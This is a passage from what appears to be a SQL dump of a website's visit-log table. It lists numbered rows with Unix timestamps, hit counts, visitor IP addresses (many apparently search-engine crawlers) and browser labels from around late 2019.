37.53.110.17','firefox'),(458850,1572508121,1,1,0,0,'66.249.64.26','chrome'),(458851,1572508413,1,1,0,0,'207.46.13.51','other'),(458852,1572508713,1,1,0,0,'66.249.64.27','chrome'),(458853,1572508886,1,1,0,0,'91.196.178.88','chrome'),(458854,1572508947,1,1,0,0,'178.154.200.60','other'),(458855,1572509009,1,1,0,0,'91.196.178.71','chrome'),(458856,1572509053,1,1,0,0,'95.108.181.103','other'),(458857,1572510048,1,1,0,0,'66.249.64.26','chrome'),(458858,1572511012,1,1,0,0,'91.196.178.88','chrome'),(458859,1572511171,1,1,0,0,'87.250.224.90','other'),(458860,1572511423,1,1,0,0,'46.120.255.82','chrome'),(458861,1572511460,1,1,0,0,'66.249.64.27','chrome'),(458862,1572511769,1,1,0,0,'178.133.172.157','chrome'),(458863,1572512608,1,1,0,0,'8.29.198.25','other'),(458864,1572513104,1,1,0,0,'8.29.198.27','other'),(458865,1572513180,1,1,0,0,'37.9.113.177','other'),(458866,1572513295,1,1,0,0,'213.180.203.44','other'),(458867,1572513805,1,1,0,0,'94.23.58.212','firefox'),(458868,1572513934,1,1,0,0,'141.8.142.128','other'),(458869,1572514718,1,1,0,0,'37.9.113.97','other'),(458870,1572515753,1,1,0,0,'194.42.196.174','chrome'),(458871,1572516008,1,1,0,0,'91.196.178.178','chrome'),(458872,1572516051,1,1,0,0,'66.249.64.28','chrome'),(458873,1572516131,1,1,0,0,'66.249.64.26','chrome'),(458874,1572516352,2,2,0,0,'141.8.142.50','other'),(458875,1572516526,2,2,0,0,'91.196.178.87','firefox'),(458876,1572517012,1,1,0,0,'157.55.39.156','other'),(458877,1572517212,1,1,0,0,'46.219.96.18','chrome'),(458878,1572517699,1,1,0,0,'37.9.113.97','other'),(458879,1572517794,1,1,0,0,'66.249.64.26','chrome'),(458880,1572518249,1,1,0,0,'66.249.64.28','chrome'),(458881,1572518900,1,1,0,0,'37.9.113.97','other'),(458882,1572519066,1,1,0,0,'178.154.200.13','other'),(458883,1572519087,1,1,0,0,'157.55.39.156','other'),(458884,1572519419,1,1,0,0,'66.249.64.26','chrome'),(458885,1572520254,1,1,0,0,'37.54.208.254','chrome'),(458886,1572520560,1,1,0,0,'141.8.188.25','other'),(458887,1572520588,1,1,0,0,'91.204.213.22','chrome'),(458888,1572521545,1,1,0,0,'66.249.64.26','chrome'),(458889,1572522054,1,1,0,0,'66.249.64.27','chrome'),(458890,1572523113,1,1,0,0,'91.204.213.22','chrome'),(458891,1572523372,1,1,0,0,'141.8.142.119','other'),(458892,1572523490,1,1,0,0,'8.29.198.27','other'),(458893,1572523727,1,1,0,0,'66.249.64.28','chrome'),(458894,1572523983,1,1,0,0,'8.29.198.26','other'),(458895,1572524273,1,1,0,0,'66.249.64.26','chrome'),(458896,1572524382,1,1,0,0,'212.90.45.139','firefox'),(458897,1572524943,1,1,0,0,'87.250.224.104','other'),(458898,1572526189,1,1,0,0,'37.9.113.177','other'),(458899,1572526436,1,1,0,0,'37.54.20.82','chrome'),(458900,1572526474,1,1,0,0,'66.249.64.26','chrome'),(458901,1572526509,1,1,0,0,'66.249.64.28','chrome'),(458902,1572527182,1,1,0,0,'5.45.207.49','other'),(458903,1572527420,3,3,0,0,'66.249.64.26','chrome'),(458904,1572527552,1,1,0,0,'37.9.113.39','other'),(458905,1572527834,1,1,0,0,'89.25.74.180','chrome'),(458906,1572528468,1,1,0,0,'91.196.178.178','chrome'),(458907,1572528937,1,1,0,0,'66.249.64.28','chrome'),(458908,1572529082,1,1,0,0,'109.74.154.72','chrome'),(458909,1572529615,1,1,0,0,'66.249.64.26','chrome'),(458910,1572529821,1,1,0,0,'91.196.178.87','firefox'),(458911,1572530090,1,1,0,0,'66.249.64.27','chrome'),(458912,1572530859,1,1,0,0,'77.222.143.222','msie'),(458913,1572530991,1,1,0,0,'181.177.115.157','chrome'),(458914,1572532396,1,1,0,0,'91.196.178.88','chrome'),(458915,1572532633,1,1,0,0,'37.9.113.39','other'),(458916,1572532979,1,1,0,0,'94.153.108.200','chrome'),(458917,1572533204,1,1,0,0,'193.106.30.99','chrome'),(458918,1572533419,1,1,0,0,'91.196.178.178','chrome'),(458919,1572533602,1,1,0,0,'91.196.178.81','chrome'),(458920,1572534386,1,1,0,0,'8.29.198.25','other'),(458921,1572534550,1,1,0,0,'91.196.178.104','chrome'),(458922,1572534869,1,1,0,0,'8.29.198.27','other'),(458923,1572535406,1,1,0,0,'91.196.178.7','chrome'),(458924,1572535427,1,1,0,0,'66.249.70.33','chrome'),(458925,1572535933,1,1,0,0,'91.196.177.46','chrome'),(458926,1572536255,1,1,0,0,'66.249.64.26','chrome'),(458927,1572536976,1,1,0,0,'37.9.113.97','other'),(458928,1572537211,1,1,0,0,'77.222.143.222','msie'),(458929,1572537230,1,1,0,0,'46.120.255.82','chrome'),(458930,1572537478,1,1,0,0,'66.249.70.36','chrome'),(458931,1572538736,1,1,0,0,'157.55.39.156','other'),(458932,1572538899,1,1,0,0,'91.196.178.78','firefox'),(458933,1572539031,1,1,0,0,'141.8.142.2','other'),(458934,1572539167,1,1,0,0,'141.8.142.128','other'),(458935,1572539284,3,3,0,0,'66.249.64.28','chrome'),(458936,1572539404,1,1,0,0,'37.9.113.142','other'),(458937,1572539510,2,2,0,0,'66.249.64.26','chrome'),(458938,1572539584,1,1,0,0,'93.73.240.248','chrome'),(458939,1572539943,1,1,0,0,'66.249.64.27','chrome'),(458940,1572540471,1,1,0,0,'66.249.64.26','chrome'),(458941,1572540588,1,1,0,0,'157.55.39.135','other'),(458942,1572541862,2,2,0,0,'66.249.64.27','chrome'),(458943,1572541975,1,1,0,0,'66.249.70.62','chrome'),(458944,1572541994,2,2,0,0,'66.249.64.26','chrome'),(458945,1572542935,2,2,0,0,'66.249.64.28','chrome'),(458946,1572543047,1,1,0,0,'66.249.70.62','chrome'),(458947,1572543389,1,1,0,0,'31.13.127.2','other'),(458948,1572543390,1,1,0,0,'31.13.127.11','other'),(458949,1572543574,1,1,0,0,'66.249.64.27','chrome'),(458950,1572544342,1,1,0,0,'157.55.39.220','other'),(458951,1572544406,1,1,0,0,'157.55.39.219','other'),(458952,1572545258,1,1,0,0,'8.29.198.26','other'),(458953,1572545763,1,1,0,0,'8.29.198.25','other'),(458954,1572546040,1,1,0,0,'157.55.39.220','other'),(458955,1572546600,1,1,0,0,'78.111.186.240','chrome'),(458956,1572546631,1,1,0,0,'178.154.200.60','other'),(458957,1572547482,1,1,0,0,'94.153.102.233','chrome'),(458958,1572548767,1,1,0,0,'66.249.64.27','chrome'),(458959,1572549187,1,1,0,0,'66.249.64.26','chrome'),(458960,1572549229,1,1,0,0,'157.55.39.156','other'),(458961,1572549750,1,1,0,0,'157.55.39.219','other'),(458962,1572550316,1,1,0,0,'141.8.183.15','other'),(458963,1572550404,1,1,0,0,'66.249.64.26','chrome'),(458964,1572551256,1,1,0,0,'207.46.13.224','other'),(458965,1572551729,1,1,0,0,'141.8.142.164','other'),(458966,1572552248,2,2,0,0,'66.249.64.28','chrome'),(458967,1572552503,1,1,0,0,'207.46.13.224','other'),(458968,1572552600,1,1,0,0,'17.58.101.25','other'),(458969,1572553252,1,1,0,0,'37.9.113.97','other'),(458970,1572553566,1,1,0,0,'66.249.64.26','chrome'),(458971,1572554364,1,1,0,0,'5.45.207.49','other'),(458972,1572554562,1,1,0,0,'66.249.64.26','chrome'),(458973,1572555235,1,1,0,0,'157.55.39.219','other'),(458974,1572555297,2,2,0,0,'157.55.39.173','other'),(458975,1572555355,1,1,0,0,'178.154.200.33','other'),(458976,1572556050,1,1,0,0,'141.8.183.33','other'),(458977,1572556130,2,2,0,0,'8.29.198.26','other'),(458978,1572558187,1,1,0,0,'37.9.113.33','other'),(458979,1572559300,1,1,0,0,'141.8.142.50','other'),(458980,1572560546,1,1,0,0,'141.8.188.38','other'),(458981,1572561973,1,1,0,0,'141.8.188.38','other'),(458982,1572561995,1,1,0,0,'207.46.13.224','other'),(458983,1572562544,1,1,0,0,'157.55.39.173','other'),(458984,1572563718,1,1,0,0,'157.55.39.173','other'),(458985,1572563955,1,1,0,0,'66.249.64.28','chrome'),(458986,1572564026,1,1,0,0,'66.249.64.26','chrome'),(458987,1572564386,1,1,0,0,'37.9.113.39','other'),(458988,1572565720,1,1,0,0,'141.8.142.128','other'),(458989,1572566225,1,1,0,0,'52.162.161.148','other'),(458990,1572566418,3,3,0,0,'3.133.124.50','chrome'),(458991,1572566983,1,1,0,0,'8.29.198.27','other'),(458992,1572567506,1,1,0,0,'8.29.198.25','other'),(458993,1572570902,2,2,0,0,'89.163.242.62','other'),(458994,1572572051,1,1,0,0,'122.51.64.147','other'),(458995,1572572146,2,2,0,0,'157.55.39.173','other'),(458996,1572572560,1,1,0,0,'66.249.64.26','chrome'),(458997,1572572939,1,1,0,0,'54.186.25.97','other'),(458998,1572573499,1,1,0,0,'141.8.142.177','other'),(458999,1572576495,1,1,0,0,'141.8.142.50','other'),(459000,1572577835,2,2,0,0,'8.29.198.25','other'),(459001,1572578499,1,1,0,0,'66.249.64.28','chrome'),(459002,1572580633,1,1,0,0,'209.17.96.122','other'),(459003,1572581252,1,1,0,0,'37.9.113.39','other'),(459004,1572583327,1,1,0,0,'87.250.224.90','other'),(459005,1572584541,1,1,0,0,'157.55.39.222','other'),(459006,1572584927,1,1,0,0,'66.249.64.28','chrome'),(459007,1572586132,2,2,0,0,'157.55.39.8','other'),(459008,1572587408,1,1,0,0,'207.46.13.123','other'),(459009,1572588684,2,2,0,0,'8.29.198.26','other'),(459010,1572588785,1,1,0,0,'66.249.64.28','chrome'),(459011,1572590089,1,1,0,0,'91.196.177.46','chrome'),(459012,1572590366,1,1,0,0,'91.196.178.79','chrome'),(459013,1572591040,1,1,0,0,'91.196.177.110','chrome'),(459014,1572591142,1,1,0,0,'77.75.147.72','chrome'),(459015,1572593957,1,1,0,0,'91.196.178.79','chrome'),(459016,1572594308,1,1,0,0,'157.55.39.166','other'),(459017,1572595010,2,2,0,0,'207.46.13.210','other'),(459018,1572595507,1,1,0,0,'193.138.93.1','other'),(459019,1572596065,1,1,0,0,'66.249.64.26','chrome'),(459020,1572596151,1,1,0,0,'94.180.183.194','msie'),(459021,1572596328,2,2,0,0,'66.249.64.28','chrome'),(459022,1572597083,1,1,0,0,'66.249.64.26','chrome'),(459023,1572597500,1,1,0,0,'207.46.13.7','other'),(459024,1572597954,1,1,0,0,'66.249.64.28','chrome'),(459025,1572598722,1,1,0,0,'91.196.178.36','chrome'),(459026,1572598792,1,1,0,0,'193.106.30.99','chrome'),(459027,1572598994,3,3,0,0,'91.196.178.135','firefox'),(459028,1572599308,1,1,0,0,'91.196.178.65','firefox'),(459029,1572599361,1,1,0,0,'207.46.13.7','other'),(459030,1572599542,2,2,0,0,'8.29.198.25','other'),(459031,1572599564,1,1,0,0,'157.55.39.166','other'),(459032,1572600064,1,1,0,0,'91.196.178.135','firefox'),(459033,1572600211,1,1,0,0,'91.209.11.236','other'),(459034,1572601218,1,1,0,0,'207.46.13.7','other'),(459035,1572601225,1,1,0,0,'91.209.11.236','other'),(459036,1572602171,3,3,0,0,'91.209.11.236','other'),(459037,1572602455,2,2,0,0,'207.46.13.7','other'),(459038,1572603432,1,1,0,0,'66.249.64.26','chrome'),(459039,1572604263,1,1,0,0,'66.249.64.27','chrome'),(459040,1572604455,2,2,0,0,'157.55.39.166','other'),(459041,1572605843,2,2,0,0,'91.196.178.79','chrome'),(459042,1572606154,1,1,0,0,'92.63.111.27','chrome'),(459043,1572606487,2,2,0,0,'207.46.13.184','other'),(459044,1572606608,1,1,0,0,'87.250.224.90','other'),(459045,1572606974,1,1,0,0,'207.46.13.7','other'),(459046,1572607093,1,1,0,0,'31.13.127.19','other'),(459047,1572607094,1,1,0,0,'31.13.127.3','other'),(459048,1572608946,1,1,0,0,'141.8.188.39','other'),(459049,1572609303,1,1,0,0,'91.196.178.181','chrome'),(459050,1572610067,1,1,0,0,'46.211.134.83','chrome'),(459051,1572610291,1,1,0,0,'141.8.142.119','other'),(459052,1572610431,2,2,0,0,'8.29.198.27','other'),(459053,1572610776,1,1,0,0,'91.196.178.79','chrome'),(459054,1572610825,1,1,0,0,'158.255.215.187','chrome'),(459055,1572612673,1,1,0,0,'91.196.178.65','firefox'),(459056,1572613546,3,3,0,0,'91.196.178.79','chrome'),(459057,1572614623,2,2,0,0,'157.55.39.166','other'),(459058,1572614992,2,2,0,0,'91.196.178.79','chrome'),(459059,1572615101,1,1,0,0,'91.196.178.181','chrome'),(459060,1572615139,1,1,0,0,'109.74.154.72','chrome'),(459061,1572615472,1,1,0,0,'66.249.64.26','chrome'),(459062,1572616729,1,1,0,0,'195.177.126.208','firefox'),(459063,1572617584,1,1,0,0,'159.203.121.11','other'),(459064,1572617665,1,1,0,0,'178.154.200.71','other'),(459065,1572618535,1,1,0,0,'46.211.133.87','chrome'),(459066,1572619018,2,2,0,0,'157.55.39.166','other'),(459067,1572619178,1,1,0,0,'141.8.188.25','other'),(459068,1572619549,2,2,0,0,'157.55.39.83','other'),(459069,1572619684,1,1,0,0,'141.8.132.12','other'),(459070,1572621266,1,1,0,0,'178.133.93.205','chrome'),(459071,1572621322,1,1,0,0,'8.29.198.27','other'),(459072,1572621489,27,27,0,0,'66.249.64.26','chrome'),(459073,1572621612,2,2,0,0,'66.249.64.28','chrome'),(459074,1572621621,2,2,0,0,'66.249.64.27','chrome'),(459075,1572621671,93,93,0,0,'88.198.69.233','other'),(459076,1572621921,1,1,0,0,'8.29.198.26','other'),(459077,1572622213,1,1,0,0,'199.244.88.124','chrome'),(459078,1572622421,1,1,0,0,'46.211.131.244','chrome'),(459079,1572622616,2,2,0,0,'66.249.64.28','chrome'),(459080,1572622869,1,1,0,0,'66.249.70.33','chrome'),(459081,1572622878,1,1,0,0,'66.249.64.27','chrome'),(459082,1572622883,1,1,0,0,'66.249.64.26','chrome'),(459083,1572623703,1,1,0,0,'46.211.131.244','chrome'),(459084,1572624287,1,1,0,0,'178.154.200.27','other'),(459085,1572624500,1,1,0,0,'207.46.13.241','other'),(459086,1572625410,1,1,0,0,'157.55.39.83','other'),(459087,1572626486,1,1,0,0,'46.211.154.65','chrome'),(459088,1572627200,1,1,0,0,'46.211.245.134','chrome'),(459089,1572627248,3,3,0,0,'157.55.39.166','other'),(459090,1572627279,1,1,0,0,'91.196.178.51','chrome'),(459091,1572627401,3,3,0,0,'207.46.13.184','other'),(459092,1572627835,2,2,0,0,'46.211.216.137','chrome'),(459093,1572628074,1,1,0,0,'66.249.64.26','chrome'),(459094,1572628084,1,1,0,0,'157.55.39.167','other'),(459095,1572628652,1,1,0,0,'91.214.87.190','chrome'),(459096,1572629149,1,1,0,0,'46.211.154.165','chrome'),(459097,1572629888,1,1,0,0,'66.249.64.26','chrome'),(459098,1572630277,1,1,0,0,'213.179.252.1','chrome'),(459099,1572630357,1,1,0,0,'91.196.178.51','chrome'),(459100,1572630685,1,1,0,0,'87.250.224.90','other'),(459101,1572630803,1,1,0,0,'46.211.128.216','chrome'),(459102,1572631632,1,1,0,0,'178.154.200.27','other'),(459103,1572632196,1,1,0,0,'8.29.198.25','other'),(459104,1572632802,1,1,0,0,'8.29.198.27','other'),(459105,1572632997,1,1,0,0,'66.249.64.28','chrome'),(459106,1572635234,1,1,0,0,'37.9.113.33','other'),(459107,1572635608,2,2,0,0,'157.55.39.231','other'),(459108,1572635941,1,1,0,0,'66.249.64.28','chrome'),(459109,1572635942,1,1,0,0,'66.249.64.26','chrome'),(459110,1572637167,1,1,0,0,'157.55.39.167','other'),(459111,1572638995,1,1,0,0,'157.55.39.231','other'),(459112,1572639374,3,3,0,0,'158.69.245.219','other'),(459113,1572640788,1,1,0,0,'195.114.145.51','chrome'),(459114,1572642646,1,1,0,0,'66.102.9.16','chrome'),(459115,1572643053,1,1,0,0,'8.29.198.27','other'),(459116,1572643682,1,1,0,0,'8.29.198.26','other'),(459117,1572645090,1,1,0,0,'74.208.23.170','other'),(459118,1572647356,1,1,0,0,'207.46.13.28','other'),(459119,1572650038,1,1,0,0,'37.9.113.10','other'),(459120,1572650804,1,1,0,0,'207.46.13.185','other'),(459121,1572650872,1,1,0,0,'207.46.13.28','other'),(459122,1572651794,1,1,0,0,'54.36.149.67','other'),(459123,1572651966,1,1,0,0,'66.249.64.28','chrome'),(459124,1572652265,1,1,0,0,'207.46.13.235','other'),(459125,1572653641,1,1,0,0,'37.9.113.33','other'),(459126,1572653897,2,2,0,0,'8.29.198.26','other'),(459127,1572653966,2,2,0,0,'157.55.39.70','other'),(459128,1572654021,1,1,0,0,'66.249.64.28','chrome'),(459129,1572654223,2,2,0,0,'207.46.13.26','other'),(459130,1572655212,1,1,0,0,'157.55.39.70','other'),(459131,1572655587,3,3,0,0,'207.46.13.185','other'),(459132,1572655772,2,2,0,0,'66.249.64.28','chrome'),(459133,1572655776,1,1,0,0,'66.249.64.26','chrome'),(459134,1572656358,1,1,0,0,'207.46.13.235','other'),(459135,1572656686,1,1,0,0,'54.36.149.14','other'),(459136,1572656863,1,1,0,0,'94.153.103.205','chrome'),(459137,1572656871,1,1,0,0,'207.46.13.112','other'),(459138,1572657879,2,2,0,0,'157.55.39.70','other'),(459139,1572658123,1,1,0,0,'141.8.188.25','other'),(459140,1572659275,1,1,0,0,'66.249.64.26','chrome'),(459141,1572659395,1,1,0,0,'207.46.13.112','other'),(459142,1572659418,1,1,0,0,'66.249.64.27','chrome'),(459143,1572659982,1,1,0,0,'157.55.39.70','other'),(459144,1572660222,1,1,0,0,'207.46.13.185','other'),(459145,1572660555,1,1,0,0,'66.249.64.26','chrome'),(459146,1572661239,1,1,0,0,'51.75.104.169','msie'),(459147,1572661832,1,1,0,0,'207.46.13.112','other'),(459148,1572662578,1,1,0,0,'157.55.39.97','other'),(459149,1572663027,1,1,0,0,'141.8.132.37','other'),(459150,1572663078,1,1,0,0,'213.180.203.44','other'),(459151,1572663596,2,2,0,0,'66.249.64.26','chrome'),(459152,1572663967,1,1,0,0,'193.106.30.99','chrome'),(459153,1572664251,1,1,0,0,'207.46.13.185','other'),(459154,1572664298,1,1,0,0,'54.36.149.102','other'),(459155,1572664737,1,1,0,0,'8.29.198.26','other'),(459156,1572665424,1,1,0,0,'8.29.198.27','other'),(459157,1572665619,1,1,0,0,'141.8.183.33','other'),(459158,1572666314,1,1,0,0,'66.249.64.27','chrome'),(459159,1572666498,1,1,0,0,'207.46.13.112','other'),(459160,1572666926,2,2,0,0,'157.55.39.70','other'),(459161,1572667119,1,1,0,0,'157.55.39.97','other'),(459162,1572667324,1,1,0,0,'207.46.13.185','other'),(459163,1572669047,1,1,0,0,'37.9.113.39','other'),(459164,1572669088,1,1,0,0,'66.249.64.28','chrome'),(459165,1572669256,1,1,0,0,'207.46.13.112','other'),(459166,1572669294,1,1,0,0,'54.36.149.3','other'),(459167,1572669930,2,2,0,0,'157.55.39.97','other'),(459168,1572671205,1,1,0,0,'91.209.11.236','other'),(459169,1572671385,1,1,0,0,'207.46.13.112','other'),(459170,1572672842,1,1,0,0,'87.250.224.90','other'),(459171,1572672962,1,1,0,0,'66.249.64.27','chrome'),(459172,1572673172,1,1,0,0,'157.55.39.70','other'),(459173,1572675574,1,1,0,0,'8.29.198.26','other'),(459174,1572675750,1,1,0,0,'5.255.253.8','other'),(459175,1572675753,1,1,0,0,'95.108.181.103','other'),(459176,1572676290,1,1,0,0,'8.29.198.25','other'),(459177,1572678176,1,1,0,0,'31.13.127.14','other'),(459178,1572678177,1,1,0,0,'31.13.127.10','other'),(459179,1572678542,1,1,0,0,'146.120.101.17','other'),(459180,1572679394,1,1,0,0,'207.46.13.112','other'),(459181,1572680422,1,1,0,0,'207.46.13.112','other'),(459182,1572680905,1,1,0,0,'31.13.127.10','other'),(459183,1572680907,1,1,0,0,'31.13.127.18','other'),(459184,1572681451,1,1,0,0,'66.249.70.62','chrome'),(459185,1572682164,1,1,0,0,'87.250.224.104','other'),(459186,1572683080,1,1,0,0,'66.249.64.27','chrome'),(459187,1572683435,1,1,0,0,'213.180.203.44','other'),(459188,1572683742,1,1,0,0,'178.154.200.60','other'),(459189,1572683849,1,1,0,0,'66.249.64.26','chrome'),(459190,1572685654,2,2,0,0,'207.46.13.112','other'),(459191,1572685784,1,1,0,0,'66.249.64.26','chrome'),(459192,1572686415,1,1,0,0,'8.29.198.27','other'),(459193,1572687146,1,1,0,0,'8.29.198.25','other'),(459194,1572688637,1,1,0,0,'66.249.64.28','chrome'),(459195,1572689880,1,1,0,0,'207.46.13.49','other'),(459196,1572690739,1,1,0,0,'5.255.253.8','other'),(459197,1572691621,1,1,0,0,'207.46.13.185','other'),(459198,1572691794,1,1,0,0,'54.36.149.97','other'),(459199,1572691799,3,3,0,0,'193.106.30.99','firefox'),(459200,1572691900,1,1,0,0,'157.55.39.70','other'),(459201,1572692695,1,1,0,0,'157.55.39.85','other'),(459202,1572693098,1,1,0,0,'141.8.142.115','other'),(459203,1572693331,1,1,0,0,'157.55.39.97','other'),(459204,1572694045,1,1,0,0,'207.46.13.49','other'),(459205,1572694218,1,1,0,0,'207.46.13.185','other'),(459206,1572694343,1,1,0,0,'37.9.113.33','other'),(459207,1572694466,1,1,0,0,'157.55.39.45','other'),(459208,1572694778,1,1,0,0,'66.249.64.28','chrome'),(459209,1572697263,1,1,0,0,'8.29.198.27','other'),(459210,1572697387,1,1,0,0,'109.74.154.72','chrome'),(459211,1572697485,1,1,0,0,'207.46.13.49','other'),(459212,1572697503,1,1,0,0,'157.55.39.45','other'),(459213,1572697981,1,1,0,0,'178.154.200.33','other'),(459214,1572698007,1,1,0,0,'8.29.198.26','other'),(459215,1572700303,1,1,0,0,'207.46.13.21','other'),(459216,1572700322,1,1,0,0,'157.55.39.70','other'),(459217,1572700324,1,1,0,0,'178.154.200.71','other'),(459218,1572700741,2,2,0,0,'66.249.64.26','chrome'),(459219,1572701048,1,1,0,0,'66.249.64.28','chrome'),(459220,1572702460,1,1,0,0,'91.196.178.40','chrome'),(459221,1572702514,1,1,0,0,'157.55.39.70','other'),(459222,1572702816,1,1,0,0,'141.8.142.119','other'),(459223,1572703261,1,1,0,0,'66.249.64.27','chrome'),(459224,1572703967,1,1,0,0,'66.249.64.28','chrome'),(459225,1572704526,1,1,0,0,'66.249.64.27','chrome'),(459226,1572705491,2,2,0,0,'157.55.39.70','other'),(459227,1572706436,2,2,0,0,'157.55.39.70','other'),(459228,1572707023,1,1,0,0,'207.46.13.21','other'),(459229,1572707736,3,3,0,0,'34.67.251.4','chrome'),(459230,1572707754,3,3,0,0,'35.193.88.206','chrome'),(459231,1572707769,2,2,0,0,'146.148.38.171','chrome'),(459232,1572708121,1,1,0,0,'8.29.198.25','other'),(459233,1572708299,1,1,0,0,'66.249.64.27','chrome'),(459234,1572708567,1,1,0,0,'91.217.90.160','firefox'),(459235,1572708884,1,1,0,0,'8.29.198.26','other'),(459236,1572709018,1,1,0,0,'89.46.102.12','msie'),(459237,1572711172,2,2,0,0,'157.55.39.45','other'),(459238,1572711887,2,2,0,0,'207.46.13.49','other'),(459239,1572713507,1,1,0,0,'207.46.13.49','other'),(459240,1572713531,1,1,0,0,'157.55.39.45','other'),(459241,1572714814,1,1,0,0,'213.180.203.44','other'),(459242,1572715589,1,1,0,0,'157.55.39.70','other'),(459243,1572718480,1,1,0,0,'157.55.39.102','other'),(459244,1572718509,1,1,0,0,'207.46.13.21','other'),(459245,1572718970,1,1,0,0,'8.29.198.27','other'),(459246,1572719746,1,1,0,0,'8.29.198.26','other'),(459247,1572720150,1,1,0,0,'157.55.39.70','other'),(459248,1572720320,1,1,0,0,'207.46.13.49','other'),(459249,1572721359,1,1,0,0,'207.46.13.49','other'),(459250,1572721544,1,1,0,0,'94.153.105.89','other'),(459251,1572722980,1,1,0,0,'207.46.13.49','other'),(459252,1572723173,1,1,0,0,'31.13.127.19','other'),(459253,1572723174,1,1,0,0,'31.13.127.9','other'),(459254,1572723631,1,1,0,0,'157.55.39.70','other'),(459255,1572723967,1,1,0,0,'193.106.30.99','chrome'),(459256,1572723969,1,1,0,0,'37.54.21.42','chrome'),(459257,1572724138,1,1,0,0,'31.13.127.8','other'),(459258,1572724139,1,1,0,0,'31.13.127.2','other'),(459259,1572724423,1,1,0,0,'91.196.178.102','chrome'),(459260,1572724904,2,2,0,0,'157.55.39.118','other'),(459261,1572725756,1,0,1,0,'66.249.64.27',''),(459262,1572726749,1,1,0,0,'207.46.13.21','other'),(459263,1572727296,1,1,0,0,'128.75.91.60','msie'),(459264,1572727980,1,1,0,0,'207.46.13.21','other'),(459265,1572728934,2,2,0,0,'31.13.127.22','other'),(459266,1572728935,1,1,0,0,'31.13.127.18','other'),(459267,1572728936,1,1,0,0,'31.13.127.12','other'),(459268,1572729821,2,2,0,0,'8.29.198.26','other'),(459269,1572730013,1,1,0,0,'37.9.113.10','other'),(459270,1572731067,1,1,0,0,'207.46.13.21','other'),(459271,1572731094,1,1,0,0,'66.249.64.27','chrome'),(459272,1572731305,2,2,0,0,'157.55.39.70','other'),(459273,1572733133,1,1,0,0,'157.55.39.118','other'),(459274,1572733601,2,2,0,0,'46.48.13.161','chrome'),(459275,1572734708,1,1,0,0,'66.249.64.27','chrome'),(459276,1572734740,1,1,0,0,'78.11.166.100','chrome'),(459277,1572736116,1,1,0,0,'157.55.39.70','other'),(459278,1572738909,3,3,0,0,'157.55.39.70','other'),(459279,1572739133,1,1,0,0,'207.46.13.21','other'),(459280,1572740586,1,1,0,0,'157.55.39.70','other'),(459281,1572740660,1,1,0,0,'8.29.198.27','other'),(459282,1572741447,1,1,0,0,'8.29.198.26','other'),(459283,1572741928,1,1,0,0,'207.46.13.59','other'),(459284,1572742972,2,2,0,0,'66.249.64.27','chrome'),(459285,1572745699,1,1,0,0,'157.55.39.182','other'),(459286,1572746624,1,1,0,0,'46.242.11.44','msie'),(459287,1572746685,1,1,0,0,'209.17.97.34','other'),(459288,1572748116,1,1,0,0,'207.46.13.59','other'),(459289,1572748582,2,2,0,0,'157.55.39.182','other'),(459290,1572749577,2,2,0,0,'207.46.13.185','other'),(459291,1572749920,3,3,0,0,'66.249.64.26','chrome'),(459292,1572750409,2,2,0,0,'66.249.64.27','chrome'),(459293,1572751442,1,1,0,0,'66.249.64.26','chrome'),(459294,1572751495,1,1,0,0,'8.29.198.25','other'),(459295,1572751591,2,2,0,0,'66.249.70.33','chrome'),(459296,1572751655,1,1,0,0,'66.249.64.27','chrome'),(459297,1572752301,1,1,0,0,'8.29.198.26','other'),(459298,1572752310,1,1,0,0,'37.9.113.142','other'),(459299,1572753644,1,1,0,0,'51.15.119.40','chrome'),(459300,1572753683,1,1,0,0,'207.46.13.72','other'),(459301,1572754202,1,1,0,0,'207.46.13.185','other'),(459302,1572756626,1,1,0,0,'207.46.13.185','other'),(459303,1572756920,1,0,1,0,'66.249.64.27',''),(459304,1572756948,1,0,1,0,'66.249.64.26',''),(459305,1572757162,1,1,0,0,'207.46.13.72','other'),(459306,1572757505,1,1,0,0,'66.249.64.28','chrome'),(459307,1572757814,1,1,0,0,'213.180.203.44','other'),(459308,1572758194,1,1,0,0,'207.46.13.72','other'),(459309,1572759446,3,3,0,0,'66.249.64.27','chrome'),(459310,1572759468,1,1,0,0,'207.46.13.72','other'),(459311,1572759597,1,1,0,0,'66.249.76.122','chrome'),(459312,1572761006,2,2,0,0,'66.249.64.26','chrome'),(459313,1572761158,3,3,0,0,'66.249.64.27','chrome'),(459314,1572762330,1,1,0,0,'8.29.198.27','other'),(459315,1572762780,1,1,0,0,'66.249.64.27','chrome'),(459316,1572763167,1,1,0,0,'8.29.198.25','other'),(459317,1572763941,1,1,0,0,'37.9.113.142','other'),(459318,1572764166,2,2,0,0,'66.249.64.27','chrome'),(459319,1572764420,2,2,0,0,'66.249.64.26','chrome'),(459320,1572765453,1,1,0,0,'66.249.70.33','chrome'),(459321,1572765569,2,2,0,0,'66.249.64.27','chrome'),(459322,1572765733,1,1,0,0,'157.55.39.4','other'),(459323,1572765737,1,1,0,0,'207.46.13.72','other'),(459324,1572766009,2,2,0,0,'66.249.64.28','chrome'),(459325,1572766791,1,1,0,0,'31.13.127.17','other'),(459326,1572766793,1,1,0,0,'31.13.127.10','other'),(459327,1572767654,1,1,0,0,'207.46.13.185','other'),(459328,1572768088,1,1,0,0,'66.249.70.36','chrome'),(459329,1572768216,2,2,0,0,'157.55.39.176','other'),(459330,1572768223,2,2,0,0,'66.249.64.26','chrome'),(459331,1572768240,2,2,0,0,'66.249.64.27','chrome'),(459332,1572768785,1,1,0,0,'66.249.64.28','chrome'),(459333,1572769044,1,1,0,0,'46.211.150.253','chrome'),(459334,1572769744,2,2,0,0,'66.249.64.27','chrome'),(459335,1572770375,2,2,0,0,'157.55.39.176','other'),(459336,1572770626,1,1,0,0,'207.46.13.185','other'),(459337,1572770775,1,1,0,0,'91.196.178.130','other'),(459338,1572771041,1,1,0,0,'207.46.13.72','other'),(459339,1572771147,1,1,0,0,'66.249.70.36','chrome'),(459340,1572771756,1,1,0,0,'66.249.64.28','chrome'),(459341,1572771893,1,1,0,0,'157.55.39.176','other'),(459342,1572772262,1,1,0,0,'66.249.70.33','chrome'),(459343,1572772280,3,3,0,0,'66.249.64.26','chrome'),(459344,1572773157,1,1,0,0,'8.29.198.26','other'),(459345,1572773223,1,1,0,0,'207.46.13.72','other'),(459346,1572773464,2,2,0,0,'66.249.64.27','chrome'),(459347,1572774009,1,1,0,0,'8.29.198.25','other'),(459348,1572774284,2,2,0,0,'66.249.64.26','chrome'),(459349,1572774630,1,1,0,0,'91.196.178.134','chrome'),(459350,1572774780,2,2,0,0,'66.249.64.28','chrome'),(459351,1572775203,1,1,0,0,'66.249.64.26','chrome'),(459352,1572775997,3,